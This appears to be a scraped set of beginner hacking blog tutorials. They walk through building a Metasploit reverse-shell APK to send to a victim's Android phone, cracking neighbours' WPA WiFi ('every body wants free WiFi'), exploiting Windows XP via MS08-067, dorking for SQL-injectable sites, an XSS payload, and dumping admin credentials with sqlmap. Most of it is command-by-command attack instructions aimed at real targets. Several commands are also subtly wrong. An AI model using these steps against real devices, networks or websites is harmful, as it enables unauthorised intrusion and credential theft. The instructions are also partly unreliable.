Hack Android Mobile With Metasploit step by step

Hack Android Mobile With Metasploit step by step

Hello Guys, Today in this post we will discuss how to hack android mobile there are may ways of the android hacking but today I will show you how you can hack android mobile using Metasploit because metasploit is a free ware framework so we can hack mobile by this method. First let me start with introduction.

Android

Android is a mobile operating system based on the linux kernel developed by google. primarily android is designed for touch screen mobiles such as smartphone, tablet e.t.c with user interface based on the direct mainupulation.

So let’s come to point.

Pre requisite:

  1. Android Phone
  2. Attacker system Kali linux
  3. Metasploit
  4. Brain 🙂

so this are the requirements to perform this practical in this post In metasploit series i am covering from basics and will cover up to post exploitation.

  • As an attacker we need to check our ip address using “ifconfig” command to set LHOST & LPORT.
  • Now you Need to create a msfpayload use the following command.

msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT [Port which you want to forward] R > /var/www/anyname.apk

hack android mobile using metasploit

Here as  I setted an LPORT is 443 because there is a one good reason behind this the reason is that almost every mobile has 443 open.

by using above command the apk will created..

  • Now launch msfconsole
  • here we use exploit multihandler to start our attack as well as payload.
  • use the following commands given below.

use exploit/multi/handler [Enter]
set payload/android/meterpreter/reverse_tcp [Enter]
Set LHOST= attacker Ip
set LPORT=443

Now we need to give permission to our apk that we created attack.apk  for giving permission use this command

chmod 777 /var/www/attack.apk

Yeah, we gave permission to our apk Now, I will send file to victim. Before installing this file to victim just start your metasploit listener using exploit command. when victim installed your apk then metaploit behaviour changes like this and shows you session opened..

hack android mobile using metasploit

Now our listner is listening traffic and giving information.

In previous tutorial we discussed post exploitation with meterpreter in netapi windows xp vulnerability read carefully steps are same.

Keep learning and practising…

Hack WiFi password wpa/wpa2 using Aircrack

Hack WiFi password WPA and WPA2 Using Aircrack-ng

Hello guys, Today in this post we are going to discuss about how to hack wifi password. I know every body like this tutorial because every body wants free WiFi. so lets start but firstly let me give you some information about WPA and WPA2.

WiFi Protected Access (WPA) and WiFi Protected Access II (WPA2) are two security protocols developed WiFi Allaince to secure the wireless network.

WiFi Protected Access (WPA)

Introduced as security enhancement over WEP while the 802.11i wireless security standar was being developed. WPA could be implemented by upgrading firmwares of wireless network interfaces card.

WiFi Protected Access II (WPA2)

Introduced as security enhancement over WPA. Based on 802.11i which was finalised in 2004. the most security enhancement of WPA2 over WPA is Advance Encrption Standard (AES).

Note: WPA and WPA2 should be implemented without using WPS feature because WPS feature allowed to be bypassed on WPA and WPA2 encryption and effectively broken in many situations.

Now lets go to our work.

Pre-requisites

  1. Kali Linux
  2. Wireless adapter in you are using virtual machine.
  3. Brain 🙂

Lets start..

  1. Open up you terminal and type ifconfig.

This will show you all available networking interfaces which are connected to your device.

2. Now type in terminal airmon-ng  and hit enter and it will show you interface here my interface is wlan0. so my command would be airmon-ng start wlan0 type this command in terminal and hit enter.

3. Here the  message ” monitor mode enabled on mon0 ” means that my card is successfully put into monitor mode.

hack wifi password

4. Now type the command airmon-ng mon0 here my monitor is mon0 thats why i used mon0. You will have to use that interface on which your monitor mode enabled.

5. Using airmon-ng mon0 command it will show you list of all the nearest bssid and channel of WiFi access point.

hack wifi password

6.Yeah we got bssid, essid channel please note that all thing and open a new terminal and enter the following command given below and hit enter. for more details see following image as shown below.

airodump-ng -c[channel] -bssid[bssid here] -w [type the file name that you want] mon0

hack wifi password

Now the above command will show this of result and monitor only the targeted network and allow us to capture more specific informations. here we are waiting for a device to connect or reconnect to the network.

hack wifi password

7. Now, its time to connect a four way handshake so that we can get a plain password of the network. here is a tricky part if there is a client connected to network then there will a mac address listed in the station column. but if there is someone connected to a network the you can de-authenticate him so that he/she will try to reconnect to a network by this command.

aireplay-ng -0 3 -a [Bssid of the network] -c [mac address of pc] -0 3 mon0

hack wifi password

Here you can send any number of packets but few packets will be enough if you don’t get three way Handshake then you cannot hit Ctrl+c to stop them.

8. When you enter the above command it will send de-authentication packet and the client gets disconnected to a network  and will try to reconnect again and we will get a four way handshake file.

check whether the handshake is completed or not. see the below image showing handshake completed.

hack wifi password

9. Now, it’s time to crack a four way handshake. First see where is our handshake .cap extension file is saved so please enter the following.

hack wifi password

10. Now it’s time to bruteforce .cap file using aircrack but for bruteforcing .cap file you need a wordlist .there are few of them in kali linux but you can download or create using crunch. Aircrack simply try to match the following password which will be in dictionary and when password will be match then it will show you the matched password.

11. Here we are using darkc0de.lst password file which is placed in “/root/Desktop/darkc0de.lst”

12. Final steps enter the following command which is given below.

aircrack-ng -w [location of password list] -b [mac address of client] [cap file location with asterik *.cap] as shown in below image.

hack wifi password

Aircrack try to bruteforce but it’s depend upon the cpu processing speed and size of file it may be take too much of your’s time.

After executing the above command this type of screen appear.

hack wifi password

if key found then a message will come keyfound. But if you can’t get password then you can try all types of password combination wordlist which will take a lots of your time.

Exploit windows xp by metasploit Netapi vulnerability

Exploit windows xp by metasploit Netapi vulnerability

Hello guys, hope you were doing better and practising today in this tutorial i will show how you can exploit windows xp using metasploit.

In this tutorial we will exploit windows xp by MS08-67 Netapi vulnerability so,               which type of vulnerability is this ..?   the answer is this is a vulnerability in windows samba service called called MS08-67 this exploits work on the port number 445 and upto windows xp sp3 version.

Name- Microsoft server service relative path stack corruption. 
Exploit- exploit/windows/smb/ms_08_67_netapi
  • As I told you above this vulnerablility will work on the port number 445 so firstly scan for open ports.
  • open Nmap and scan for open ports by this command nmap -n -sV 192.168.1.*

metasploit

  • yeah port 445 is open.
  • start msfconsole and use the above exploit as shown below
  • now set RHOST. RHOST is remote address of victim

metasploit

  • now set payload as shown below here payload is set here to get a reverse connection in meterpreter here we are using windows meterpreter if you want to see all avilable apyload for that exploit then use “show payloads” command. Here we are using this payload
windows/meterpreter/reverse_tcp
  • Now use show options command and set LHOST Lhost is your IP address
  • Run exploit yeah we get back connection with victim pc.

Post Exploitation with meterpreter

  • type sysinfo to get the system information of victim.

metasploit

Here you see that in the above image victims information is available. There are many types of options in meterprer you can check with ‘ ? ‘ command. Suppose if you want to shell that pc so run ‘shell’ command in the metrpreter shell will be created.

In our metasploit soonly i will update many of the tutorials on metasploit series because metasploit has many of the exploits, auxiliary, payloads, script, e.t.c which will help you for exploitation.

keep learning and practising because practise makes a man perfect… 🙂

 

How to find sql vulnerable website easily

How to find sql vulnerable website easily

Hello guys in this post I will show you how you can find a lots sql vulnerable website in by single dork using automated tool but I recommended you to find manually. Many of the newbie don’t get vulnerable site easily to inject so in this tutorial they can be able to  find  sql vulnerable website easily.

So in this tutorial we will use SQL DB if you don’t have SQL DB then you can download it from google.

  • Launch SQL DB and in the left position you will see search option.

sql vulnerable site

  • just enter your dork. here the best feature of this tool is it has the option of search engine by which search engine you wanna use and the another one is Deep scan and proxy.
  • when you start search using your dork then it will start scanning.
  • now scanning started here you can see many of the multiple tab such as proxy, vulnerable e.t.c
  • just click on that vulnerable and it show you the list of sql vulnerable website

Cross site scripting (XSS) Vulnerability

Cross site scripting (XSS) Vulnerability

Hello Guys , Welcome to Infosec Zone today I gonna show you Cross site scripting vulnerability which is one of the most dangerous vulnerability and listed in owasp top 10 read carefully try and practice. In this tutorial we will cover Reflected Cross site scripting in GET Method and Post Method.

What is cross site scripting ( XSS )

XSS is a Type of attack in which an attacker inject a malicious script in website. XSS occur when use web application in the form of browser side script to different end users.

Malicious script can access any cookies, session, tokens or other sensitive information e.t.c. It is caused by insufficient input validations in server side as well as client side.

There are basic two types of XSS

  • Reflected cross site scripting XSS Attack (Non-Persistent)
  • Stored cross site scripting XSS Attack (Persistent)

Read their more information in OWASP official website

So lets start Practical…

Here I am using bWAPP on my localhost you can use this or DVWA. But I thinks that bWAPP is quite much better than DVWA.

So in this practical we use this payload

<img src=lol.png onerror=prompt(document.domain) />

first select xss vulnerability to attack and start.

XSS

<img src=lol.png onerror=prompt(document.domain) />

Just paste this payload in first name and last name and click go as a result you can see that our code is executed and got a popup.cross site scripting Xss

great we had successfully XSSED…. 🙂

The above XSS was GET method. Lets start Post Method for Post Method the requirement is hackbar Addon in firefox. install it if you don’t have and follow me step by step.

just click on post data in hackbar and type any thing in both field and load URL you will see some thing like this.

xss attack

in post data add the payload. see in below image and execute

xss post 2

yeah our code is executed…Keep learning.. 🙂 and share it

 

 

 

 

 

 

SQL injection through SQLMAP step by step

SQL Injection through SQLMAP

Hello Guy, Today I gonna show you a major vulnerability in web applications. There are many types of injection and in this a SQL Injection Comes also. SQL Injection is very vast keep learning even though I am also still learner so without wasting any time lets come to point.

SQL Injection

SQL Injection is a type of vulnerability in which an attacker can execute can some code and expose backend database or in simple words an attacker can dump your database.

SQL Map

SQL map is a command line interface tool use for exploiting SQL injection vulnerabilities it is a open source tool .

If you are using windows you can download SQL Map Here , However Kali has inbuilt SQLMAP

Lets start practicle…….

  • Launch SQLMAP

Now type Following command in terminal

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 –current-db

Sql injections attack

  • Now our SQL map started. It will take some couple of seconds to enumerate database
  • now we got the database as you can see the above image. our next step is to enumerate tables
  • Type the following command to enumerate tables follow me step by step. 🙂

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name –table

sql injection by sqlmap

as you can see in the below image we had successfully enumerate table names.

sql injections vulnerability

In the above Image you can see that sqlmap enumerated table name no we will have to find column. here i am finding columns fo admin.

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name –columns

again sqlmap is enumerating column name from the table admin.

Sql injections tutorial

Cool guys we had successfully enumerate the column name now our next step is to dump/enumerate the Username and password.

Follow me and use this command

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D database name -T table name -C column name –dump

sql injections

sql map started a enumerating database as you can see database enumerated.

Sql Injection

yeah, we got username and password.. 🙂 keep learning and practising but don’t harm any site…